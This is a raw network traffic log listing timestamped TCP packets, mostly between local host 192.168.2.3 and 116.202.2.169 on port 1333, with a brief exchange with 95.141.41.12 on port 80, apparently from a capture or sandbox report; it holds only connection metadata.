Sep 28, 2023 06:01:59.524508953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524545908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524553061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524590969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524645090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524697065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524772882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524826050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524873972 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524913073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524924994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524950027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524955988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524987936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524995089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525036097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525088072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525125980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525134087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525162935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525168896 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525201082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525206089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525242090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525270939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525316000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525340080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525384903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525409937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525465012 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525480986 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525520086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525527000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525556087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525562048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525597095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525655985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525691986 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525707006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525728941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525733948 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525768042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525827885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525880098 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.525897026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.525943995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.526057959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.526108027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.531138897 CEST	80	49813	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.531212091 CEST	49813	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.701674938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.701700926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.701759100 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.701802015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.701837063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.701884031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.701905966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.701946020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702008009 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702048063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702079058 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702119112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702164888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702213049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702291012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702337027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702425003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702469110 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702488899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702526093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702558041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702596903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702656984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702702999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.702827930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.702872038 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703154087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703203917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703237057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703282118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703290939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703332901 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703342915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703385115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703560114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703608036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703617096 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703660011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703691959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703737974 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703746080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703790903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703840971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.703888893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.703958988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704008102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704287052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704335928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704400063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704442978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704498053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704540014 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704560041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704598904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704622984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704659939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704690933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704727888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704773903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704811096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704829931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704866886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704881907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704917908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.704937935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.704972982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705003977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705025911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705039978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705060005 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705096960 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705133915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705149889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705184937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705190897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705224991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705231905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705267906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705310106 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705347061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705368042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705404997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705492020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705534935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705619097 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705666065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705670118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705713987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705724001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705764055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705796003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705837011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705888033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705938101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.705956936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.705996037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706005096 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706042051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706060886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706099033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706130028 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706165075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706216097 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706228971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706250906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706269979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706283092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706322908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706346035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706361055 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706383944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706403017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706427097 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706463099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706480980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706515074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706531048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706568956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706605911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706635952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706645966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706671953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706701040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706737995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706770897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706809998 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706840992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706871033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706880093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706912041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.706965923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.706979990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707004070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707011938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707031965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707056999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707056999 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707094908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707101107 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707140923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707173109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707209110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707211018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707246065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707278013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707315922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707319021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707360983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707393885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707438946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707500935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707542896 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707581043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707618952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707637072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707674980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707705975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707745075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707765102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707803965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707834959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707875967 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707895994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.707931995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.707978964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708017111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708022118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708056927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708108902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708158016 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708174944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708210945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708230019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708266020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708301067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708339930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708359957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708398104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708431005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708471060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708482981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708519936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708586931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708626032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708647966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708674908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708687067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708712101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708730936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708767891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708801031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708841085 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708873034 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708919048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.708929062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.708971977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709006071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709031105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709049940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709069014 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709105015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709140062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709146976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709182024 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709187984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709228039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709244013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709285021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709304094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709346056 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709371090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709386110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709414959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709429026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709454060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709501982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709538937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709552050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709577084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709594011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709628105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709667921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709671974 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709706068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709738016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709774017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709791899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709825993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709844112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709868908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709880114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709882021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709908962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709924936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709925890 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709961891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.709974051 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.709989071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710011959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710012913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710031033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710050106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710061073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710097075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710098028 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710124016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710135937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710165977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710186958 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710201025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710223913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710254908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710285902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710325003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710328102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710342884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710356951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710364103 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710381985 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710402966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710410118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710452080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710477114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710491896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710505962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710515976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710534096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710541964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710552931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710580111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710598946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710634947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710668087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710705996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710711002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710747957 CEST	49810	1333	192.168.2.3	116.202.2.169
